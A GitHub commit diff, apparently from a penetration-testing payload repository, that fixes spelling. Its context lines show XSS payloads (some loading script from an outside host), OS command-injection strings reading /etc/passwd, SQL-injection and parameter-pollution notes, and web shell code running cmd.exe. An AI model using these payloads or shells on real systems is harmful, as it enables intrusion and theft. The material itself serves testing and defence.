Skip to content

Commit d65636f

Browse files
authored
Verify spelling fixes pass check-spelling
2 parents eee3510 + 6a4b70d commit d65636f

32 files changed

+88
-88
lines changed

attack/file-upload/README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@ see: http://cwe.mitre.org/data/definitions/434.html
44

55
* kinds of file upload verifications:
66
* content-type
7-
* filename extension verificationi (whitelist, blacklist)
7+
* filename extension verification (whitelist, blacklist)
88
* file content checking
99
* client side, ha ha ha
1010

attack/http-protocol/hpp.txt

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,4 @@
1-
# HTTP paramter polution and interpretation payloads by Jacco van Tuijl
1+
# HTTP parameter pollution and interpretation payloads by Jacco van Tuijl
22
?id=id=1
33
&id=1?id=2
44
?id['&id=1']=2

attack/os-cmd-execution/README.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -30,14 +30,14 @@ Example IFS netcat backdoor without spaces:<br>
3030

3131
$IFS shell variable:<br>
3232
``` cat$IFS/etc/passwd ```<br>
33-
increment the first +1 to retreive the entire file, line by line<br>
33+
increment the first +1 to retrieve the entire file, line by line<br>
3434
``` cat$IFS/etc/passwd|tail$IFS-n+1|head$IFS-n+1 ```
3535

3636
Shell Variables:<br>
3737
``` CMD=$'cat\x20/etc/passwd';$CMD ```
3838

3939
shell variable, increment through file one line at a time: <br>
40-
increment the first +1 to retreive the entire file, line by line<br>
40+
increment the first +1 to retrieve the entire file, line by line<br>
4141
``` SP=$'\x20';cat$SP/etc/passwd|tail$SP-n+1|head$SP-n+1 ```
4242

4343
**Exfiltrating Files / Data**

attack/sql-injection/exploit/README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -11,7 +11,7 @@ various useful post-exploitation commands
1111
**mysql-injection-login-bypass.fuzz.txt**
1212
* regex replace as many as you can with your fuzzer for best results:
1313
* <user-fieldname> <pass-fieldname> <username>
14-
* also try to brute force a list of possible usernames, including possile admin acct names
14+
* also try to brute force a list of possible usernames, including possible admin acct names
1515

1616
**mysql-read-local-files.fuzz.txt**
1717
* mysql local file disclosure through sqli

attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt

Lines changed: 10 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -427,7 +427,7 @@ Author Name: ha.ckers.org
427427
Extraneous Open Brackets
428428
Exploit Name: Extraneous Open Brackets
429429
Exploit String: <<SCRIPT>alert("XSS");//<</SCRIPT>
430-
Exploit Description: (Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error.
430+
Exploit Description: (Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to suppress a JavaScript error.
431431
Exploit Tags: general, obfuscated
432432
Author Name: ha.ckers.org
433433

@@ -518,8 +518,8 @@ Exploit Description: HTML entities (the semicolons are required for this to work
518518
Exploit Tags: general, evil tags, obfuscated, internet explorer
519519
Author Name: ha.ckers.org
520520

521-
HTML Quoute & Comment breaker
522-
Exploit Name: HTML Quoute & Comment breaker
521+
HTML Quote & Comment breaker
522+
Exploit Name: HTML Quote & Comment breaker
523523
Exploit String: '';!--"<script>alert(0);</script>=&{(alert(1))}
524524
Exploit Description: This vector breaks HTML quotes and comments.
525525
Exploit Tags: general, html breaking, comment breaking
@@ -547,7 +547,7 @@ Author Name: .mario
547547
IE closing-tag expression injection
548548
Exploit Name: IE closing-tag expression injection
549549
Exploit String: </a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
550-
Exploit Description: This vector exploits a bug in IE whre attributes in closing comments are evaluated.
550+
Exploit Description: This vector exploits a bug in IE where attributes in closing comments are evaluated.
551551
Exploit Tags: general, injection, internet explorer
552552
Author Name: .mario
553553

@@ -581,7 +581,7 @@ Exploit String: a=<a>
581581
</b>
582582
</a>
583583
document.write(unescape(a..b))
584-
Exploit Description: This vector writes an erroneous image tag with onerror hanlder inside an E4X construct into the document context.
584+
Exploit Description: This vector writes an erroneous image tag with onerror handler inside an E4X construct into the document context.
585585
Exploit Tags: general, obfuscated, gecko, XML predicates, evil tags
586586
Author Name: .mario
587587

@@ -865,7 +865,7 @@ Author Name: ha.ckers.org
865865
Mozilla -moz-binding-url injection
866866
Exploit Name: Mozilla -moz-binding-url injection
867867
Exploit String: style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
868-
Exploit Description: The vector incudes a binding file via injected style attrbute. Gecko only.
868+
Exploit Description: The vector incudes a binding file via injected style attribute. Gecko only.
869869
Exploit Tags: general, injection, gecko, style injection, XBL
870870
Author Name: .mario
871871

@@ -876,8 +876,8 @@ Exploit Description: This vector was once used on a major site to evade a stripp
876876
Exploit Tags: general, injection, gecko, style injection, XBL
877877
Author Name: PHPIDS Group
878878

879-
Multiline selfcontained XSS
880-
Exploit Name: Multiline selfcontained XSS
879+
Multiline self-contained XSS
880+
Exploit Name: Multiline self-contained XSS
881881
Exploit String: _
882882
=
883883
eval
@@ -1274,7 +1274,7 @@ Author Name: PHPIDS Group
12741274
Self-contained XSS variant 2
12751275
Exploit Name: Self-contained XSS variant 2
12761276
Exploit String: a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b))
1277-
Exploit Description: Concatenates fragmented functions to evakuate the location hash
1277+
Exploit Description: Concatenates fragmented functions to evaluate the location hash
12781278
Exploit Tags: general, self contained
12791279
Author Name: PHPIDS Group
12801280

@@ -1366,7 +1366,7 @@ content: “\61\6c\65\72\74\28\31\29″
13661366
eval(eval(document.styleSheets[0].cssRules[0].style.content))
13671367
</script>
13681368
Exploit Description: This vector utilizes the CSS content property and fetches it off the document.styleSheets property afterwards. For correct execution of the payload a double-eval is needed.
1369-
Exploit Tags: general, onfuscated, style injection
1369+
Exploit Tags: general, obfuscated, style injection
13701370
Author Name: .mario
13711371

13721372
STYLE w/Anonymous HTML

discovery/WebSocket/WebSocket-subprotocols.txt

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,12 +1,12 @@
11
# this list can be used to enumerate supported Web Socket sub protocols of a web socket server
2-
# It conyains the official IANA registerd Web Socket sub protocols
2+
# It contains the official IANA registered Web Socket sub protocols
33
# Source: https://www.iana.org/assignments/websocket/websocket.xml
44
# Example subprotocol request header:
55
# Sec-WebSocket-Protocol: mqtt, wamp
66
# The Web Socket client can include a list of the protocols when making the initial HTTP request.
77
# The server is then required to either select one of those protocols and include it in a response header.
88
# If none of the sub protocols send by the client are supported by the server,
9-
# the server shoud fail the handshake and terminate the connection.
9+
# the server should fail the handshake and terminate the connection.
1010
MBWS.huawei.com
1111
MBLWS.huawei.com
1212
soap

docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html

Lines changed: 8 additions & 8 deletions
Large diffs are not rendered by default.

docs/misc/KL0209LIT_fffap.html

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -89,7 +89,7 @@
8989

9090
Fuzzing includes a lot of testing. You could spend hours and hours modifying and compiling and running the same but slightly
9191
different code over and over just to get the better results. Planning, preparation, and testing are a part of fuzzing, and
92-
laboring hours on end for the humble task of perfection, stability, and reproduceability can thankfully be very rewarding.
92+
laboring hours on end for the humble task of perfection, stability, and reproducibility can thankfully be very rewarding.
9393

9494
Fuzzing is useful because...
9595

@@ -569,7 +569,7 @@
569569
3.2 Writing the Fuzzer
570570

571571
This example for SFTP fuzzing will be written in PERL and will be using libssh2/Net::SSH2 (this is not the only way to use
572-
and fuzz SFTP, other libaries and extensions that may be more extensive and/or low-level are available).
572+
and fuzz SFTP, other libraries and extensions that may be more extensive and/or low-level are available).
573573

574574
[sftpfuzz.pl]
575575

regex/nsa-wordlist.txt

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ Information Security
55
Information Warfare
66
IW
77
IS
8-
Priavacy Information
8+
Privacy Information
99
Terrorism
1010
Defensive
1111
Information Defense
@@ -36,7 +36,7 @@ CIA
3636
S/Key
3737
SSL
3838
FBI
39-
Secert Service
39+
Secret Service
4040
USSS
4141
Defcon
4242
Military
@@ -212,7 +212,7 @@ MI6
212212
Kh-11
213213
Shayet-13
214214
SADMS
215-
Spetznaz
215+
Spetsnaz
216216
Recce
217217
707
218218
CIO
@@ -663,7 +663,7 @@ COS
663663
E.T.
664664
credit card fraud
665665
b9
666-
assasinate
666+
assassinate
667667
virus
668668
anarchy
669669
rogue
@@ -1008,6 +1008,6 @@ China
10081008
Conficker
10091009
Worm
10101010
Scammers
1011-
Suspecious
1011+
Suspicious
10121012
Social media
10131013

web-backdoors/asp/cmdasp.aspx

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@
55
void Page_Load(object sender, EventArgs e)
66
{
77
}
8-
string ExcuteCmd(string arg)
8+
string ExecuteCmd(string arg)
99
{
1010
ProcessStartInfo psi = new ProcessStartInfo();
1111
psi.FileName = "cmd.exe";
@@ -21,7 +21,7 @@ return s;
2121
void cmdExe_Click(object sender, System.EventArgs e)
2222
{
2323
Response.Write("<pre>");
24-
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
24+
Response.Write(Server.HtmlEncode(ExecuteCmd(txtArg.Text)));
2525
Response.Write("</pre>");
2626
}
2727
</script>
@@ -32,7 +32,7 @@ Response.Write("</pre>");
3232
<body >
3333
<form id="cmd" method="post" runat="server">
3434
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
35-
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
35+
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="execute" OnClick="cmdExe_Click"></asp:Button>
3636
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
3737
</form>
3838
</body>

web-backdoors/asp/file.asp

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -116,7 +116,7 @@ end if
116116

117117
<%
118118
' get the path to work with, if it isn't set or valid then start with the web root
119-
' goofy if statement is used since vbscript doesn't use short-curcuit logic
119+
' goofy if statement is used since vbscript doesn't use short-circuit logic
120120
path = trim(Request.QueryString("path"))
121121
if len(path) = 0 then
122122
path = fso.GetFolder(Server.MapPath("\"))

web-backdoors/asp/ntdaddy.asp

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -101,7 +101,7 @@ FileAttributes = "Volume"
101101
case 16
102102
FileAttributes = "Directory"
103103
case 19
104-
FileAttributes = "Read Only, Hidden, Directoy"
104+
FileAttributes = "Read Only, Hidden, Directory"
105105
case 23
106106
FileAttributes = "Read Only, Hidden, System, Directory"
107107
case 32
@@ -188,7 +188,7 @@ FolderAttributes = "Read Only, Directory"
188188
case 18 'Extra
189189
FolderAttributes = "Hidden, Directory"
190190
case 19
191-
FolderAttributes = "Read Only, Hidden, Directoy"
191+
FolderAttributes = "Read Only, Hidden, Directory"
192192
case 20 'Extra
193193
FolderAttributes = "System, Directory"
194194
case 22 'Extra
@@ -489,7 +489,7 @@ FolderAttributes = "Read Only, Directory"
489489
case 18 'Extra
490490
FolderAttributes = "Hidden, Directory"
491491
case 19
492-
FolderAttributes = "Read Only, Hidden, Directoy"
492+
FolderAttributes = "Read Only, Hidden, Directory"
493493
case 20 'Extra
494494
FolderAttributes = "System, Directory"
495495
case 22 'Extra
@@ -600,7 +600,7 @@ FileAttributes = "Volume"
600600
case 16
601601
FileAttributes = "Directory"
602602
case 19
603-
FileAttributes = "Read Only, Hidden, Directoy"
603+
FileAttributes = "Read Only, Hidden, Directory"
604604
case 23
605605
FileAttributes = "Read Only, Hidden, System, Directory"
606606
case 32

web-backdoors/asp/proxy.asp

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -130,7 +130,7 @@ Dim r
130130
r.IgnoreCase = true
131131
r.Global = true
132132
133-
' remove the laudurl paramater
133+
' remove the laudurl parameter
134134
r.Pattern = "laudurl=[^&]+($|&)"
135135
CleanFormValues = r.Replace(request.form, "")
136136
Set r = nothing

web-backdoors/asp/shell.aspx

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -57,7 +57,7 @@ void Page_Load(object sender, System.EventArgs e) {
5757
// Check for an IP in the range we want
5858
string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1"};
5959
60-
// check if the X-Fordarded-For header exits
60+
// check if the X-Forwarded-For header exits
6161
string remoteIp;
6262
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
6363
remoteIp = Request.UserHostAddress;

web-backdoors/cfm/shell.cfm

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,7 @@
1818
***
1919
********************************************************************************
2020
***
21-
*** This file provides access to shell acces on the system.
21+
*** This file provides access to shell access on the system.
2222
*** Modified by Tim Medin
2323
*** Modified by Matt Presson <@matt_presson>
2424
*** - Added some basic authentication via HTTP header

web-backdoors/jsp/browser.jsp

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -34,13 +34,13 @@
3434
//If true, the user is allowed to browse only in RESTRICT_PATH,
3535
//if false, the user is allowed to browse all directories besides RESTRICT_PATH
3636
private static final boolean RESTRICT_WHITELIST = false;
37-
//Paths, sperated by semicolon
37+
//Paths, separated by semicolon
3838
//private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!!
3939
private static final String RESTRICT_PATH = "/etc;/var";
4040
4141
//The refresh time in seconds of the upload monitor window
4242
private static final int UPLOAD_MONITOR_REFRESH = 2;
43-
//The number of colums for the edit field
43+
//The number of columns for the edit field
4444
private static final int EDITFIELD_COLS = 85;
4545
//The number of rows for the edit field
4646
private static final int EDITFIELD_ROWS = 30;
@@ -66,14 +66,14 @@
6666
*/
6767
private static final int COMPRESSION_LEVEL = 1;
6868
/**
69-
* The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the
69+
* The FORBIDDEN_DRIVES are not displayed on the list. This can be useful, if the
7070
* server runs on a windows platform, to avoid a message box, if you try to access
7171
* an empty removable drive (See KNOWN BUGS in Readme.txt).
7272
*/
7373
private static final String[] FORBIDDEN_DRIVES = {"a:\\"};
7474
7575
/**
76-
* Command of the shell interpreter and the parameter to run a programm
76+
* Command of the shell interpreter and the parameter to run a program
7777
*/
7878
private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows
7979
//private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // Unix
@@ -1570,7 +1570,7 @@ Upload finished.
15701570
for(var x=0;x<document.FileList.elements.length;x++){
15711571
var y = document.FileList.elements[x];
15721572
var ytr = y.parentNode.parentNode;
1573-
var check = document.FileList.selall.checked;
1573+
var check = document.FileList.selectAll.checked;
15741574
if(y.name == 'selfile'){
15751575
if (y.disabled != true){
15761576
y.checked = check;
@@ -1754,7 +1754,7 @@ Upload finished.
17541754
}
17551755
}%>
17561756
</table>
1757-
<input type="checkbox" name="selall" onClick="AllFiles(this.form)">Select all
1757+
<input type="checkbox" name="selectAll" onClick="AllFiles(this.form)">Select all
17581758
<p align=center>
17591759
<b title="<%=totalSize%> bytes">
17601760
<%=convertFileSize(totalSize)%></b><b> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%>

web-backdoors/php/dns.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -60,7 +60,7 @@
6060
/* This error handler will turn all notices, warnings, and errors into fatal
6161
* errors, unless they have been suppressed with the @-operator. */
6262
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
63-
/* The @-opertor (used with chdir() below) temporarely makes
63+
/* The @-operator (used with chdir() below) temporarily makes
6464
* error_reporting() return zero, and we don't want to die in that case.
6565
* We do note the error in the output, though. */
6666
if (error_reporting() == 0) {

web-backdoors/php/file.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -61,7 +61,7 @@
6161
/* This error handler will turn all notices, warnings, and errors into fatal
6262
* errors, unless they have been suppressed with the @-operator. */
6363
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
64-
/* The @-opertor (used with chdir() below) temporarely makes
64+
/* The @-operator (used with chdir() below) temporarily makes
6565
* error_reporting() return zero, and we don't want to die in that case.
6666
* We do note the error in the output, though. */
6767
if (error_reporting() == 0) {

web-backdoors/php/host.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -59,7 +59,7 @@
5959
/* This error handler will turn all notices, warnings, and errors into fatal
6060
* errors, unless they have been suppressed with the @-operator. */
6161
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
62-
/* The @-opertor (used with chdir() below) temporarely makes
62+
/* The @-operator (used with chdir() below) temporarily makes
6363
* error_reporting() return zero, and we don't want to die in that case.
6464
* We do note the error in the output, though. */
6565
if (error_reporting() == 0) {

web-backdoors/php/killnc.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -62,7 +62,7 @@
6262
/* This error handler will turn all notices, warnings, and errors into fatal
6363
* errors, unless they have been suppressed with the @-operator. */
6464
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
65-
/* The @-opertor (used with chdir() below) temporarely makes
65+
/* The @-operator (used with chdir() below) temporarily makes
6666
* error_reporting() return zero, and we don't want to die in that case.
6767
* We do note the error in the output, though. */
6868
if (error_reporting() == 0) {

0 commit comments

Comments
 (0)